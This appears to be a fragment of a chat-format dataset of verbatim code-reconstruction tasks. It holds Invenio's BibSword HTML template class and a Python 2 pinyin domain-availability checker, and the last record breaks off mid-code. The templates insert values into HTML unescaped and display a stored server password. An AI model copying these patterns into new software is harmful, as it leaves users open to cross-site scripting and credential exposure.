\\\n '''value=\"%(journal_ref)s\"/></p>\n ''' % {\n 'journal_ref' : journal_ref\n } for journal_ref in journal_refs\n ])\n\n html = html + '''\n </td>\n </tr>\n '''\n\n return html\n\n\n def fill_report_nos_list(self, report_nos) :\n '''\n Concatate a string containing the report number html table rows\n '''\n\n html = ''\n\n if len(report_nos) > 0:\n\n html = '''\n <tr>\n <td align=\"left\"><p>Report numbers : </p></td><td>\n '''\n\n html = html + ''.join([\n '''\n <p><input type=\"text\" name=\"report_nos\" size=\"100\" ''' \\\n '''value=\"%(report_no)s\"/></p>''' % {\n 'report_no' : report_no\n } for report_no in report_nos\n ])\n\n html = html + '''\n </td>\n </tr>\n '''\n\n return html\n\n\n def get_list_id_categories(self, categories):\n '''\n gives the id of the categores tuple\n '''\n\n id_categories = []\n\n for category in categories:\n id_categories.append(category['id'])\n\n return id_categories\n\n\n def format_media_list_by_type(self, medias) :\n '''\n This function format the media by type (Main, Uploaded, ...)\n '''\n\n #format media list by type of document\n media_type = []\n\n for media in medias :\n\n # if it is the first media of this type, create a new type\n is_type_in_media_type = False\n for type in media_type :\n if media['collection'] == type['media_type'] :\n is_type_in_media_type = True\n\n if is_type_in_media_type == False :\n type = {}\n type['media_type'] = media['collection']\n type['media_list'] = []\n media_type.append(type)\n\n # insert the media in the good media_type element\n for type in media_type :\n if type['media_type'] == media['collection'] :\n type['media_list'].append(media)\n\n return media_type\n```<|memory_end|>\nReturn a verbatim reconstruction of the code.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2010 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
'''
BibSWORD Client Templates
'''
from invenio.config import CFG_SITE_URL
class BibSwordTemplate:
'''
This class contains attributes and methods that allows to display all
information used by the BibSword web user interface. Theses informations
are formular, validation or error messages
'''
def __init__(self):
''' No init necessary for this class '''
#---------------------------------------------------------------------------
# BibSword WebSubmit Interface
#---------------------------------------------------------------------------
def tmpl_display_submit_ack(self, remote_id, link):
'''
This method generate the html code that displays the acknoledgement
message after the submission of a record.
@param (remote_id) : id of the record given by arXiv
@param (links) : links to modify or consult submission
@return : string containing the html code
'''
html = ''
html += '''<h1>Success !</h1>'''
html += '''<p>The record has been successfully pushed to arXiv ! <br />''' \
'''You will get an email once it will be accepted by ''' \
'''arXiv moderator.</p>'''
html += '''<p>The arXiv id of the submission is : <b>%s</b></p>''' % \
remote_id
html += '''<p><a href="www.arxiv.org/user">Manage your submission</a></p>'''
return html
#---------------------------------------------------------------------------
# BibSword Administrator Interface
#---------------------------------------------------------------------------
def tmpl_display_admin_page(self, submissions, first_row, last_row,
total_rows, is_prev, is_last, offset,
error_messages=None) :
'''
format the html code that display the submission table
@param (submissions) : list of all submissions and their status
@return : html code to be displayed
'''
if error_messages == None :
error_messages = []
body = '''
<form method="post" enctype="multipart/form-data" onsubmit="return tester();"
accept-charset="UTF-8">
%(error_message)s
<input type="hidden" name="status" value="display_submission"/>
<input type="hidden" name="first_row" value="%(first_row)s"/>
<input type="hidden" name="last_row" value="%(last_row)s"/>
<input type="hidden" name="total_rows" value="%(total_rows)s" />
<input type="submit" name="submit" value="New submission"/><br/>
<br />
<input type="submit" name="submit" value="Refresh all"/><br/>
<br />
Display
<select name="offset">
<option value="5" %(selected_1)s>5</option>
<option value="10" %(selected_2)s>10</option>
<option value="25" %(selected_3)s>25</option>
<option value="50" %(selected_4)s>50</option>
<option value=%(total_rows)s %(selected_5)s>all</option>
</select>
rows per page <input type="submit" name="submit" value="Select" /><br />
<br />
<input type="submit" name="submit" value="First" %(is_prev)s/>
<input type="submit" name="submit" value="Prev" %(is_prev)s/>
Pages %(first_row)s - %(last_row)s / %(total_rows)s
<input type="submit" name="submit" value="Next" %(is_last)s/>
<input type="submit" name="submit" value="Last" %(is_last)s/><br/>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="7" bgcolor="#e6e6fa">
<h2>Submission state</h2>
</td>
</tr>
<tr>
<td align="center" bgcolor="#e6e6fa"><b>Remote server</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Submitter</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Record number</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Remote id</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Status</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Dates</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Links</b></td>
</tr>
%(submissions)s
</table>
</form>''' % {
'error_message' : \
self.display_error_message_row(error_messages),
'table_width' : '100%',
'first_row' : first_row,
'last_row' : last_row,
'total_rows' : total_rows,
'is_prev' : is_prev,
'is_last' : is_last,
'selected_1' : offset[0],
'selected_2' : offset[1],
'selected_3' : offset[2],
'selected_4' : offset[3],
'selected_5' : offset[4],
'submissions' : self.fill_submission_table(submissions)
}
return body
def tmpl_display_remote_server_info(self, server_info) :
'''
Display a table containing all server informations
@param (server_info) : tuple containing all server infos
@return : html code for the table containing infos
'''
body = '''<table width="%(table_width)s">\n''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">ID</td>\n''' \
''' <td>%(server_id)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Name</td>\n''' \
''' <td>%(server_name)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Host</td>\n''' \
''' <td>%(server_host)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Username</td>\n''' \
''' <td>%(username)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Password</td>\n''' \
''' <td>%(password)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Email</td>\n''' \
''' <td>%(email)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Realm</td>\n''' \
''' <td>%(realm)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">Record URL</td>\n''' \
''' <td>%(url_base_record)s</td>\n''' \
''' </tr>\n ''' \
''' <tr>\n''' \
''' <td bgcolor="#e6e6fa">URL Servicedocument</td>\n'''\
''' <td>%(url_servicedocument)s</td>\n''' \
''' </tr>\n ''' \
'''</table>''' % {
'table_width' : '50%',
'server_id' : server_info['server_id'],
'server_name' : server_info['server_name'],
'server_host' : server_info['server_host'],
'username' : server_info['username'],
'password' : server_info['password'],
'email' : server_info['email'],
'realm' : server_info['realm'],
'url_base_record' : server_info['url_base_record'],
'url_servicedocument' : server_info['url_servicedocument']
}
return body
def tmpl_display_remote_servers(self, remote_servers, id_record,
error_messages):
'''
format the html code that display a dropdown list containing the
servers
@param (self) : reference to the current instance of the class
@param (remote_servers) : list of tuple containing server's infos
@return : string containing html code
'''
body = '''
<form method="post" enctype="multipart/form-data" onsubmit="return tester();"
accept-charset="UTF-8">
<input type="hidden" name="status" value="select_server"/>
%(error_message)s
<input type="submit" name="submit" value="Cancel" />
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Forward a record</h2>
</td>
</tr>
<tr>
<td align="right" width="%(row_width)s">
<p>Enter the number of the repord to submit : </p>
</td>
<td align="left" width="%(row_width)s">
<input type="text" name="id_record" size="20"
value="%(id_record)s"/>
</td>
</tr>
<tr>
<td align="right" width="%(row_width)s">
<p>Select a remote server : </p>
</td>
<td align="left" width="%(row_width)s">
<select name="id_remote_server" size="1">
<option value="0">-- select a remote server --</option>
%(remote_server)s
</select>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" value="Select" name="submit"/>
</td>
</tr>
</table>
</form>''' % {
'error_message' : \
self.display_error_message_row(error_messages),
'table_width' : '100%',
'row_width' : '50%',
'id_record' : id_record,
'remote_server' : \
self.fill_dropdown_remote_servers(remote_servers)
}
return body
def tmpl_display_collections(self, selected_server, server_infos,
collections, id_record, recid, error_messages):
'''
format the html code that display the selected server, the informations
about the selected server and a dropdown list containing the server's
collections
@param (self) : reference to the current instance of the class
@param (selected_server) : tuple containing selected server name and id
@param (server_infos) : tuple containing infos about selected server
@param (collections) : list contianing server's collections
@param (remote_servers) : list of tuple containing server's infos
@return : string containing html code
'''
body = '''
<form method="post" enctype="multipart/form-data" onsubmit="return tester();"
accept-charset="UTF-8">
<input type="hidden" name="status" value="select_collection"/>
<input type="hidden" name="id_remote_server" value="%(id_server)s"/>
<input type="hidden" name="id_record" value="%(id_record)s"/>
<input type="hidden" name="recid" value="%(recid)s"/>
%(error_message)s
<input type="submit" name="submit" value="Cancel" />
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Remote server</h2></td>
</tr>
<tr>
<td align="center" rowspan="2" valign="center">
<h2>%(server_name)s</h2>
</td>
<td align="left">
SWORD version : %(server_version)s
</td>
</tr>
<tr>
<td align="left">
Max upload size [Kb] : %(server_maxUpload)s
</td>
</tr>
<tr>
<td align="left" colspan="2">
<input type="submit" value="Modify server" name="submit"/>
</td>
</tr>
</table>
<p> </p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa"><h2>Collection</h2>
</td>
</tr>
<tr>
<td align="right" width="%(row_width)s">Select a collection : </td>
<td align="left" width="%(row_width)s">
<select name="id_collection" size="1">
<option value="0">-- select a collection --</option>
%(collection)s
</select>
</td>
</tr>
<tr>
<td align="center" colspan="2">
<input type="submit" value="Select" name="submit"/>
</td>
</tr>
</table>
</form>''' % {
'table_width' : '100%',
'row_width' : '50%',
'error_message' : \
self.display_error_message_row(error_messages),
'id_server' : selected_server['id'],
'server_name' : selected_server['name'],
'server_version' : server_infos['version'],
'server_maxUpload' : server_infos['maxUploadSize'],
'collection' : \
self.fill_dropdown_collections(collections),
'id_record' : id_record,
'recid' : recid
}
return body
def tmpl_display_categories(self, selected_server, server_infos,
selected_collection, collection_infos,
primary_categories, secondary_categories,
id_record, recid, error_messages):
'''
format the html code that display the selected server, the informations
about the selected server, the selected collections, the informations
about the collection and a dropdown list containing the server's
primary and secondary categories
@param (self) : reference to the current instance of the class
@param (selected_server) : tuple containing selected server name and id
@param (server_infos) : tuple containing infos about selected server
@param (collections) : tuple containing selected collection
@param (collection_infos) : tuple containing infos about selected col
@param (primary_categories) : list of mandated categories for the col
@param (remote_servers) : list of optional categories for the col
@return : string containing html code
'''
body = '''
<form method="post" enctype="multipart/form-data" onsubmit="return tester();"
accept-charset="UTF-8">
<input type="hidden" name="status" value="select_primary_category"/>
<input type="hidden" name="id_remote_server" value="%(id_server)s"/>
<input type="hidden" name="id_collection" value="%(id_collection)s"/>
<input type="hidden" name="id_record" value="%(id_record)s"/>
<input type="hidden" name="recid" value="%(recid)s"/>
%(error_message)s
<input type="submit" name="submit" value="Cancel" />
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Remote server</h2>
</td>
</tr>
<tr>
<td align="center" rowspan="2" valign="center">
<h2>%(server_name)s</h2>
</td>
<td align="left">
SWORD version : %(server_version)s
</td>
</tr>
<tr>
<td align="left">
Max upload size [Kb] : %(server_maxUpload)s
</td>
</tr>
<tr>
<td align="left" colspan="2">
<input type="submit" value="Modify server" name="submit"/>
</td>
</tr>
</table>
<p> </p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Collection</h2>
</td>
</tr>
<tr>
<td align="center" rowspan="2" valign="center">
<h2>%(collection_name)s</h2>
</td>
<td align="left">
URL : %(collection_url)s
</td>
</tr>
<tr>
<td align="left">
Accepted media types:
<ul>%(collection_accept)s</ul>
</td>
</tr>
<tr>
<td align="left" colspan=2>
<input type="submit" value="Modify collection" name="submit"/>
</td>
</tr>
</table>
<p> </p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Mandatory category</h2>
</td>
</tr>
<tr>
<td align="right" width="%(row_width)s">
<p>Select a mandated category : </p>
</td>
<td align="left" width="%(row_width)s">
<select name="id_primary" size="1">
<option value="0">-- select a category --</option>
%(primary_categories)s
</select>
</td>
</tr>
</table>
<p></p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Optional categories</h2>
</td>
</tr>
<td align="right" width="%(row_width)s">
<p>Select optional categories : </p>
</td>
<td align="left" width="%(row_width)s">
<select name="id_categories" size="10" multiple>
%(secondary_categories)s
</select>
</td>
</tr>
</table>
<p> </p>
<center>
<input type="submit" value="Select" name="submit"/>
</center>
</form>''' % {
'table_width' : '100%',
'row_width' : '50%',
'error_message' : self.display_error_message_row(
error_messages),
# hidden input
'id_server' : selected_server['id'],
'id_collection' : selected_collection['id'],
'id_record' : id_record,
'recid' : recid,
# variables values
'server_name' : selected_server['name'],
'server_version' : server_infos['version'],
'server_maxUpload' : server_infos['maxUploadSize'],
'collection_name' : selected_collection['label'],
'collection_accept' : ''.join([
'''<li>%(name)s </li>''' % {
'name' : accept
} for accept in collection_infos['accept'] ]),
'collection_url' : selected_collection['url'],
'primary_categories' : self.fill_dropdown_primary(
primary_categories),
'secondary_categories': self.fill_dropdown_secondary(
secondary_categories)
}
return body
def tmpl_display_metadata(self, user, server, collection, primary,
categories, medias, metadata, id_record, recid,
error_messages):
'''
format a string containing every informations before a submission
'''
body = '''
<form method="post" enctype="multipart/form-data" onsubmit="return tester();"
accept-charset="UTF-8">
<input type="hidden" name="status" value="check_submission"/>
<input type="hidden" name="id_remote_server" value="%(id_server)s"/>
<input type="hidden" name="id_collection" value="%(id_collection)s"/>
<input type="hidden" name="id_primary" value="%(id_primary)s"/>
<input type="hidden" name="id_categories" value="%(id_categories)s"/>
<input type="hidden" name="id_record" value="%(id_record)s"/>
<input type="hidden" name="recid" value="%(recid)s"/>
%(error_message)s
<input type="submit" name="submit" value="Cancel" />
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="2" bgcolor="#e6e6fa">
<h2>Destination</h2>
</td>
</tr>
<tr>
<td align="center" rowspan="3" valign="center">
<h2>%(server_name)s</h2>
</td>
<td align="left">
Collection : %(collection_name)s ( %(collection_url)s )
</td>
</tr>
<tr>
<td align="left">
Primary category : %(primary_name)s ( %(primary_url)s )
</td>
</tr>
%(categories)s
<tr>
<td align="left" colspan="2">
<input type="submit" value="Modify destination" name="submit"/>
</td>
</tr>
</table>
<p> </p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="4" bgcolor="#e6e6fa">
<h2>Submitter</h2>
</td>
</tr>
<tr>
<td width="%(row_width)s">Name :</td>
<td><input type="text" name="author_name" size="100"
value="%(user_name)s"/></td>
</tr>
<tr>
<td>Email :</td>
<td><input type="text" name="author_email" size="100"
value="%(user_email)s"/></td>
</tr>
</table>
<p></p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="4" bgcolor="#e6e6fa"><h2>Media</h2></td>
</tr>
<tr><td colspan="4">%(medias)s%(media_help)s</td></tr>
</table>
<p></p>
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="3" bgcolor="#e6e6fa"><h2>Metadata</h2> <font color="red"><b>Warning :</b> modification(s) will not be saved on Invenio</font>
</td>
</tr>
<tr>
<td align="left" width="%(row_width)s"><p>Id* :</p></td>
<td><input type="text" name="id" size="100" value="%(id)s"/></td>
</tr>
<tr>
<td align="left" width="%(row_width)s"><p>Title* :</p></td>
<td><input type="text" name="title" size="100" value="%(title)s"/>
</td>
</tr>
<tr>
<td align="left" width="%(row_width)s"><p>Summary* :</p></td>
<td>
<textarea name="summary" rows="4" cols="100">%(summary)s
</textarea>
</td>
</tr>
%(contributors)s
%(journal_refs)s
%(report_nos)s
</table>
<p><font color="red">The fields having a * are mandatory</font></p>
<center>
<input type="submit" value="Submit" name="submit"/>
</center>
<form>''' % {
'table_width' : '100%',
'row_width' : '25%',
'error_message' : \
self.display_error_message_row(error_messages),
# hidden input
'id_server' : server['id'],
'id_collection' : collection['id'],
'id_primary' : primary['id'],
'id_categories' : self.get_list_id_categories(categories),
'id_record' : id_record,
'recid' : recid,
# variables values
'server_name' : server['name'],
'collection_name' : collection['label'],
'collection_url' : collection['url'],
'primary_name' : primary['label'],
'primary_url' : primary['url'],
'categories' : self.fill_optional_category_list(categories),
#user
'user_name' : user['nickname'],
'user_email' : user['email'],
# media
'medias' : self.fill_media_list(medias, server['id']),
'media_help' : self.fill_arxiv_help_message(),
# metadata
'id' : metadata['id'],
'title' : metadata['title'],
'summary' : metadata['summary'],
'contributors' : self.fill_contributors_list(
metadata['contributors']),
'journal_refs' : self.fill_journal_refs_list(
metadata['journal_refs']),
'report_nos' : self.fill_report_nos_list(
metadata['report_nos'])
}
return body
def tmpl_display_list_submission(self, submissions):
'''
Display the data of submitted recods
'''
body = '''
<form method="post" enctype="multipart/form-data" onsubmit="return tester();"
accept-charset="UTF-8">
<table border="1" valign="top" width="%(table_width)s">
<tr>
<td align="left" colspan="7" bgcolor="#e6e6fa">
<h2>Document successfully submitted !</h2>
</td>
</tr>
<tr>
<td align="center" bgcolor="#e6e6fa"><b>Remote server</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Submitter</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Record id</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Remote id</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Status</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Dates</b></td>
<td align="center" bgcolor="#e6e6fa"><b>Links</b></td>
</tr>
%(submissions)s
</table>
<a href=%(CFG_SITE_URL)s/bibsword>Return</a>
</form>''' % {
'table_width' : '100%',
'submissions' : self.fill_submission_table(submissions),
'CFG_SITE_URL' : CFG_SITE_URL
}
return body
#***************************************************************************
# Private functions
#***************************************************************************
def display_error_message_row(self, error_messages):
'''
return a list of error_message in form of a bullet list
@param (error_messages) : list of error_messages to display
@return : html code that display list of errors
'''
# if no errors, return nothing
if len(error_messages) == 0:
return ''
if len(error_messages) == 1:
# display a generic header message
body = '''
<tr>
<td align="left" colspan=2>
<font color='red'>
<p> The following error was found in the formular : </p>
<ul>
'''
else :
# display a generic header message
body = '''
<tr>
<td align="left" colspan=2>
<font color='red'>
<p> Following errors were found in the formular : </p>
<ul>
'''
# insert each error lines
for error_message in error_messages :
body = body + '''
<li>%(error)s</li>''' % {
'error' : error_message
}
body = body + '''
</ul>
</font>
</td>
</tr>'''
return body
def fill_submission_table(self, submissions) :
'''
This method return the body of the submission state table. each
submissions given in parameters has one row
@param (submissions) : submission status list
@return: html table body
'''
return ''.join([
''' <tr>
<td>%(id_server)s : <a href="%(server_infos)s">
%(server_name)s</a></td>
<td>%(user_name)s <br/> %(user_email)s</td
<td>%(id_bibrec)s : <a href="%(cfg_site_url)s/record/%(id_bibrec)s"
target="_blank">%(no_bibrec)s</a></td>
<td><a href="%(url_base_remote)s/%(id_remote)s" target="_blank">
%(id_remote)s</a></td>
<td>%(status)s</td>
<td><b>submission : </b> %(submission_date)s <br/>
<b>publication : </b> %(publication_date)s <br/>
<b>removal : </b> %(removal_date)s </td>
<td><b>media : </b> <a href="%(media_link)s" target="_blank">
%(media_link)s</a> <br/>
<b>metadata : </b> <a href="%(metadata_link)s" target="_blank">
%(metadata_link)s</a> <br />
<b>status : </b> <a href="%(status_link)s" target="_blank">
%(status_link)s</a></td>
</tr>''' % {
'id_server' : str(submission['id_server']),
'server_infos' : "%s/bibsword/remoteserverinfos?id=%s" % \
(CFG_SITE_URL, submission['id_server']),
'server_name' : str(submission['server_name']),
'user_name' : str(submission['user_name']),
'user_email' : str(submission['user_email']),
'id_bibrec' : str(submission['id_record']),
'no_bibrec' : str(submission['report_no']),
'id_remote' : str(submission['id_remote']),
'status' : str(submission['status']),
'submission_date' : str(submission['submission_date']),
'publication_date' : str(submission['publication_date']),
'removal_date' : str(submission['removal_date']),
'media_link' : str(submission['link_medias']),
'metadata_link' : str(submission['link_metadata']),
'status_link' : str(submission['link_status']),
'url_base_remote' : str(submission['url_base_remote']),
'cfg_site_url' : CFG_SITE_URL
} for submission in submissions])
def fill_dropdown_remote_servers(self, remote_servers):
'''
This method fill a dropdown list of remote servers.
@param (collections) : list of all collections with name - url
@param (selected_col_url) : URL of the selected collection
@return (html colde) : code html to display
'''
return ''.join([
'''<option value="%(id)s">%(name)s - %(host)s</option>''' % {
'id' : str(remote_server['id']),
'name' : remote_server['name'],
'host' : remote_server['host']
} for remote_server in remote_servers])
def fill_dropdown_collections(self, collections):
'''
This method fill a dropdown list of collection.
@param (collections) : list of all collections with name - url
@param (selected_col_url) : URL of the selected collection
@return (html colde) : code html to display
'''
return ''.join([
'''<option value="%(id)s">%(name)s</option>''' % {
'id' : str(collection['id']),
'name' : collection['label']
} for collection in collections])
def fill_dropdown_primary(self, primary_categories):
'''
This method fill the primary dropdown list with the data given in
parameter
@param (primary) : list of 'url' 'name' tuples
@return (body) : html code generated to display the list
'''
return ''.join([
'''<option value="%(id)s">%(name)s</option>''' % {
'id' : primary_categorie['id'],
'name' : primary_categorie['label']
} for primary_categorie in primary_categories])
def fill_dropdown_secondary(self, categories):
'''
This method fill a category list. This list is allows the multi-selection
or items. To proced to select more than one categorie through a browser
ctrl + clic
@param (categories) : list of all categories in the format name - url
@reutrn (html code) : the html code that display each dropdown list
'''
if len(categories) == '' :
return ''
return ''.join([
'''<option value="%(id)s">%(name)s</option>''' % {
'id' : category['id'],
'name' : category['label']
} for category in categories])
def fill_optional_category_list(self, categories):
'''
This method fill a table row that contains name and url of the selected
optional categories
@param (self) : reference to the current instance of the class
@param (categories) : list of tuples containing selected categories
@return (body) : html code generated to display the list
'''
if len(categories) == 0 :
return ''
else :
body = '<tr><td>'
body = body + ''.join([
'''<p>Category : %(category_name)s ( %(category_url)s )</p>'''%{
'category_name' : category['label'],
'category_url' : category['url']
} for category in categories
])
body = body + '</td></tr>'
return body
def fill_media_list(self, medias, id_server, from_websubmit=False):
'''
Concatenate the string that contains all informations about the medias
'''
text = ''
if id_server == 1 :
media_type = self.format_media_list_by_type(medias)
text = '''<h2>Please select files you would like to push to arXiv:</h2>'''
for type in media_type :
text += '''<h3><b>%s : </b></h3>''' % type['media_type']
text += '''<blockquote>'''
for media in type['media_list'] :
text += '''<input type='checkbox' name="media" value="%s" %s>%s</input><br />''' % (media['path'], media['selected'], media['name'])
text += "</blockquote>"
text += '''<h3>Upload</h3>'''
text += '''<blockquote>'''
text += '''<p>In addition, you can submit a new file (that will be added to the record as well):</p>'''
if from_websubmit == False :
text += '''<input type="file" name="new_media" size="60"/>'''
return text
def fill_arxiv_help_message(self) :
text = '''</blockquote><h3>Help</h3>'''
text += '''<blockquote><p>For more help on which formats are supported by arXiv, please see :'''\
'''<ul>'''\
'''<li><a href="http://arxiv.org/help/submit" target="_blank">'''\
'''arXiv submission process</a></li>'''\
'''<li><a href="http://arxiv.org/help/submit_tex" target="_blank">'''\
'''arXiv TeX submission</a></li>'''\
'''<li><a href="http://arxiv.org/help/submit_docx" target="_blank">'''\
'''arXiv Docx submission</a></li>'''\
'''<li><a href="http://arxiv.org/help/submit_pdf" target="_blank">'''\
'''arXiv PDF submission</a></li>'''\
'''</ul></blockquote>'''
return text
def fill_contributors_list(self, contributors) :
'''
This method display each contributors in the format of an editable input
text. This allows the user to modifie it.
@param (contributors) : The list of all contributors of the document
@return (html code) : the html code that display each dropdown list
'''
output = ''
is_author = True
for author in contributors :
nb_rows = 2
author_name = \
'''<LABEL for="name">Name: </LABEL><input type = "text" ''' \
'''name = "contributor_name" size = "100" value = "%s" ''' \
'''id="name"/>''' % author['name']
author_email = \
'''<LABEL for = "email">Email: </LABEL>''' \
'''<input type = "text" name = "contributor_email" ''' \
'''size = "100" value = "%s" id = "email"/>''' % author['email']
author_affiliations = []
for affiliation in author['affiliation'] :
affiliation_row = \
'''<LABEL for = "affiliation">Affiliation: </LABEL> ''' \
'''<input type="text" name = "contributor_affiliation" ''' \
'''size = "100" value = "%s" id = "affiliation"/>''' % \
affiliation
author_affiliations.append(affiliation_row)
nb_rows = nb_rows + 1
affiliation_row = \
'''<LABEL for = "affiliation">Affiliation: </LABEL>''' \
'''<input type = "text" name = "contributor_affiliation" ''' \
'''size = "100" id = "affiliation"/>'''
author_affiliations.append(affiliation_row)
nb_rows = nb_rows + 1
if is_author :
output += '''<tr><td rowspan = "%s">Author : </td>''' % nb_rows
is_author = False
else :
output += '''<tr><td rowspan = "%s">Contributor : </td>''' % \
nb_rows
output += '''<td>%s</td></tr>''' % author_name
if author_email != '':
output += '''<tr><td>%s</td></tr>''' % author_email
for affiliation in author_affiliations :
output += '''<tr><td>%s</td></tr>''' % affiliation
output += \
'''<input type = "hidden" name = "contributor_affiliation" ''' \
'''value = "next"/>'''
return output
def fill_journal_refs_list(self, journal_refs):
'''
This method display each journal references in the format of an editable
input text. This allows the user to modifie it.
@param (journal_refs) : The list of all journal references of the document
@return (html code) : the html code that display each dropdown list
'''
html = ''
if len(journal_refs) > 0:
html += '''
<tr>
<td align="left"><p>Journal references : </p></td><td>
'''
html = html + ''.join([
'''
<p><input type="text" name="journal_refs" size="100" ''' \
'''value="%(journal_ref)s"/></p>
''' % {
'journal_ref' : journal_ref
} for journal_ref in journal_refs
])
html = html + '''
</td>
</tr>
'''
return html
def fill_report_nos_list(self, report_nos) :
'''
Concatate a string containing the report number html table rows
'''
html = ''
if len(report_nos) > 0:
html = '''
<tr>
<td align="left"><p>Report numbers : </p></td><td>
'''
html = html + ''.join([
'''
<p><input type="text" name="report_nos" size="100" ''' \
'''value="%(report_no)s"/></p>''' % {
'report_no' : report_no
} for report_no in report_nos
])
html = html + '''
</td>
</tr>
'''
return html
def get_list_id_categories(self, categories):
'''
gives the id of the categores tuple
'''
id_categories = []
for category in categories:
id_categories.append(category['id'])
return id_categories
def format_media_list_by_type(self, medias) :
'''
This function format the media by type (Main, Uploaded, ...)
'''
#format media list by type of document
media_type = []
for media in medias :
# if it is the first media of this type, create a new type
is_type_in_media_type = False
for type in media_type :
if media['collection'] == type['media_type'] :
is_type_in_media_type = True
if is_type_in_media_type == False :
type = {}
type['media_type'] = media['collection']
type['media_list'] = []
media_type.append(type)
# insert the media in the good media_type element
for type in media_type :
if type['media_type'] == media['collection'] :
type['media_list'].append(media)
return media_type
```
|
[
{
"content": "```python\n#coding:utf-8 \nfrom yuming import ifRegged\nimport sys\nimport time,random\n\ndicType = []\ndic = {}\n\ndtFile = open('domainType','r').readlines()\nfor t in dtFile[1:-1]:\n dicType.append(t[:-1])\n\n#print dicType\n\ntimes = [1,2,3,4]\nfor t in times:\n dic[t] = []\n\ntotalDic = []\n\npinyinFile = open('pinyin','r').readlines()\nfor py in pinyinFile[1:-1]:\n py = py[:-2]\n dic[1].append(py) \n totalDic.append(py) \n '''for py2 in pinyinFile:\n py2 = py2[:-2]\n dic[2].append(py+py2)\n totalDic.append(py+py2)'''\n''' for py3 in pinyinFile:\n py3 = py3[:-1]\n dic[3].append(py+py2+py3)\n for py4 in pinyinFile:\n py4 = py4[:-1]\n dic[4].append(py+py2+py3+py4)\n'''\n\nresult = open('unRegged','a')\n\n'''\nprint dicType[:10]\nsys.exit()\n'''\ntimer=0\nfor dm in totalDic: \n for dtype in dicType[:1]:\n domainName = dm + dtype\n try:\n print domainName\n regResult = ifRegged(domainName)\n except Exception,e:\n print domainName,e\n continue\n if regResult==1:\n print domainName + ' unRegged!'\n result.write(domainName + '\\t' + 'unRegged!' + '\\n') \n time.sleep(random.random()*1)\n timer = timer + 1\n if timer == 20:\n result.close()\n time.sleep(2)\n result = open('unRegged','a')\n timer = 0\n```\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#coding:utf-8 \nfrom yuming import ifRegged\nimport sys\nimport time,random\n\ndicType = []\ndic = {}\n\ndtFile = open('domainType','r').readlines()\nfor t in dtFile[1:-1]:\n dicType.append(t[:-1])\n\n#print dicType\n\ntimes = [1,2,3,4]\nfor t in times:\n dic[t] = []\n\ntotalDic = []\n\npinyinFile = open('pinyin','r').readlines()\nfor py in pinyinFile[1:-1]:\n py = py[:-2]\n dic[1].append(py) \n totalDic.append(py) \n '''for py2 in pinyinFile:\n py2 = py2[:-2]\n dic[2].append(py+py2)\n totalDic.append(py+py2)'''\n''' for py3 in pinyinFile:\n py3 = py3[:-1]\n dic[3].append(py+py2+py3)\n for py4 in pinyinFile:\n py4 = py4[:-1]\n dic[4].append(py+py2+py3+py4)\n'''\n\nresult = open('unRegged','a')\n\n'''\nprint dicType[:10]\nsys.exit()\n'''\ntimer=0\nfor dm in totalDic: \n for dtype in dicType[:1]:\n domainName = dm + dtype\n try:\n print domainName\n regResult = ifRegged(domainName)\n except Exception,e:\n print domainName,e\n continue\n if regResult==1:\n print domainName + ' unRegged!'\n result.write(domainName + '\\t' + 'unRegged!' + '\\n') \n time.sleep(random.random()*1)\n timer = timer + 1\n if timer == 20:\n result.close()\n 